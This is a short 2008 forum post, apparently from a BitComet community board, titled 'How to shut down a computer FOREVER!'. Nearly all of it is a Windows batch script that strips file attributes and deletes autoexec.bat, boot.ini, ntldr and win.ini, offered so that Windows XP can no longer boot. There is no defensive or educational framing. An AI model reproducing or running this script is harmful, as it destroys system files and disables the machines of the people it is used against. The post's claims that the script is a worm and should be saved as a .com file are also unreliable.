Presented by BitComet

Original Post
Relative:
HACKING upgrading windows xp

How to shut down a computer FOREVER!

Sep 27, 2008, 04:55 AM [Reply]

How to shut down a computer FOREVER!

 

CODE

 

echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

 

// note save the above code as .com extension this is actually a worm and //shut down the xp such that boot strap loader will never be able to conduct //the initialization of os untill a new os is installed

 

 

Please sign in to publish your post.